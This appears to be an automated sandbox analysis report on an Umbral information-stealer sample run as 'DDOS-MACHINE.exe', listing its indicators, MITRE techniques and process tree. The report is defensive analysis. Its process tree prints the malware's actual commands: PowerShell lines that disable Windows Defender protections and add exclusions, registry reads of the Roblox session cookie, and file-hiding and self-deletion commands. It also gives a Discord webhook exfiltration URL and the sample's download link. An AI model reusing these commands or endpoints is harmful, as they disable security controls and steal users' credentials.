umbral | hxxps://mega[.]nz/file/28ZiABaZ#Dc4ZSmw8nTLVV4gOV6is5hR60ssEpyLDm1axw3UeDBs

Analysis

max time kernel
299s
max time network
298s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
28-11-2024 20:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/28ZiABaZ#Dc4ZSmw8nTLVV4gOV6is5hR60ssEpyLDm1axw3UeDBs

Score

10^/10

umbral defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1301232708952789063/H40NxDyUmnSN5PaM5xyq34o-UG2ywIn9IB9sT9FJrZTVlU3WfLnWlqZJW9_FH52f9bwE

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002abcc-186.dat	family_umbral
behavioral1/memory/2068-203-0x00000156C8330000-0x00000156C8370000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
680	powershell.exe
3472	powershell.exe
1860	powershell.exe
1744	powershell.exe
2684	powershell.exe
1568	powershell.exe
948	powershell.exe
4792	powershell.exe
4864	powershell.exe
4388	powershell.exe
680	powershell.exe
1688	powershell.exe
2692	powershell.exe
3144	powershell.exe
1652	powershell.exe
1860	powershell.exe
3476	powershell.exe
2060	powershell.exe
2760	powershell.exe
2100	powershell.exe
1860	powershell.exe
3560	powershell.exe
3720	powershell.exe
2400	powershell.exe

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOS-MACHINE.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOS-MACHINE.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOS-MACHINE.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOS-MACHINE.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOS-MACHINE.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOS-MACHINE.exe

Executes dropped EXE 6 IoCs

pid	Process
2068	DDOS-MACHINE.exe
5104	DDOS-MACHINE.exe
3384	DDOS-MACHINE.exe
4712	DDOS-MACHINE.exe
3752	DDOS-MACHINE.exe
2432	DDOS-MACHINE.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
6	discord.com
24	discord.com
28	discord.com
33	discord.com
42	discord.com
48	discord.com
52	discord.com
2	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\DDOS-MACHINE.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2036	PING.EXE
3856	cmd.exe
3060	cmd.exe
2060	PING.EXE
4384	cmd.exe
3408	PING.EXE
3592	cmd.exe
3296	cmd.exe
2860	PING.EXE
4024	cmd.exe
960	PING.EXE
1672	PING.EXE

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2964	wmic.exe
428	wmic.exe
2332	wmic.exe
4504	wmic.exe
2252	wmic.exe
4036	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133773003297231244"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1537126222-899333903-2037027349-1000_Classes\Local Settings	chrome.exe

NTFS ADS 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\DDOS-MACHINE.exe:Zone.Identifier	chrome.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bBZpO.scr\:Zone.Identifier:$DATA	DDOS-MACHINE.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\dRKho.scr\:Zone.Identifier:$DATA	DDOS-MACHINE.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\iBEQ5.scr\:Zone.Identifier:$DATA	DDOS-MACHINE.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ruk0T.scr\:Zone.Identifier:$DATA	DDOS-MACHINE.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ZQOq8.scr\:Zone.Identifier:$DATA	DDOS-MACHINE.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\e2poy.scr\:Zone.Identifier:$DATA	DDOS-MACHINE.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
2036	PING.EXE
1672	PING.EXE
2860	PING.EXE
2060	PING.EXE
3408	PING.EXE
960	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4184	chrome.exe
4184	chrome.exe
2068	DDOS-MACHINE.exe
680	powershell.exe
680	powershell.exe
680	powershell.exe
1860	powershell.exe
1860	powershell.exe
1860	powershell.exe
948	powershell.exe
948	powershell.exe
948	powershell.exe
580	powershell.exe
580	powershell.exe
580	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
5104	DDOS-MACHINE.exe
3472	powershell.exe
3472	powershell.exe
4792	powershell.exe
4792	powershell.exe
680	powershell.exe
680	powershell.exe
1740	powershell.exe
1740	powershell.exe
4864	powershell.exe
4864	powershell.exe
3384	DDOS-MACHINE.exe
1860	powershell.exe
1860	powershell.exe
2060	powershell.exe
2060	powershell.exe
2060	powershell.exe
1688	powershell.exe
1688	powershell.exe
1740	powershell.exe
1740	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
4712	DDOS-MACHINE.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
3144	powershell.exe
3144	powershell.exe
3144	powershell.exe
1860	powershell.exe
1860	powershell.exe
1860	powershell.exe
1564	powershell.exe
1564	powershell.exe
1564	powershell.exe
2760	powershell.exe
2760	powershell.exe
2760	powershell.exe
3752	DDOS-MACHINE.exe
2684	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4184	chrome.exe
4184	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: 33	4276	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4276	AUDIODG.EXE
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeShutdownPrivilege	4184	chrome.exe
Token: SeCreatePagefilePrivilege	4184	chrome.exe
Token: SeDebugPrivilege	2068	DDOS-MACHINE.exe
Token: SeIncreaseQuotaPrivilege	3160	wmic.exe
Token: SeSecurityPrivilege	3160	wmic.exe
Token: SeTakeOwnershipPrivilege	3160	wmic.exe
Token: SeLoadDriverPrivilege	3160	wmic.exe
Token: SeSystemProfilePrivilege	3160	wmic.exe
Token: SeSystemtimePrivilege	3160	wmic.exe
Token: SeProfSingleProcessPrivilege	3160	wmic.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe

Suspicious use of SendNotifyMessage 18 IoCs

pid	Process
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe
4184	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4184 wrote to memory of 584	4184	chrome.exe	77
PID 4184 wrote to memory of 584	4184	chrome.exe	77
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1592	4184	chrome.exe	78
PID 4184 wrote to memory of 1532	4184	chrome.exe	79
PID 4184 wrote to memory of 1532	4184	chrome.exe	79
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80
PID 4184 wrote to memory of 2024	4184	chrome.exe	80

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1780	attrib.exe
2416	attrib.exe
2896	attrib.exe
4744	attrib.exe
3928	attrib.exe
1996	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/28ZiABaZ#Dc4ZSmw8nTLVV4gOV6is5hR60ssEpyLDm1axw3UeDBs
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd1101cc40,0x7ffd1101cc4c,0x7ffd1101cc58
  2⤵
  PID:584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1768,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1756 /prefetch:2
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2288 /prefetch:8
  2⤵
  PID:2024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3104 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4596,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  PID:2516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4816,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4284 /prefetch:8
  2⤵
  PID:2944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5080,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  PID:3560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5188,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:3860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5544,i,8638701242782585527,4752173904558665270,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:3444
- C:\Users\Admin\Downloads\DDOS-MACHINE.exe
  "C:\Users\Admin\Downloads\DDOS-MACHINE.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2068
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3160
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\DDOS-MACHINE.exe"
    3⤵
    - Views/modifies file attributes
    PID:2896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DDOS-MACHINE.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:580
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:652
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:492
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3476
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2964
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\DDOS-MACHINE.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3296
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2036
- C:\Users\Admin\Downloads\DDOS-MACHINE.exe
  "C:\Users\Admin\Downloads\DDOS-MACHINE.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5104
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3592
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\DDOS-MACHINE.exe"
    3⤵
    - Views/modifies file attributes
    PID:4744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DDOS-MACHINE.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1740
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:1628
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:976
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4864
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:428
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\DDOS-MACHINE.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3856
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1672
- C:\Users\Admin\Downloads\DDOS-MACHINE.exe
  "C:\Users\Admin\Downloads\DDOS-MACHINE.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3384
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:3848
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\DDOS-MACHINE.exe"
    3⤵
    - Views/modifies file attributes
    PID:3928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DDOS-MACHINE.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1860
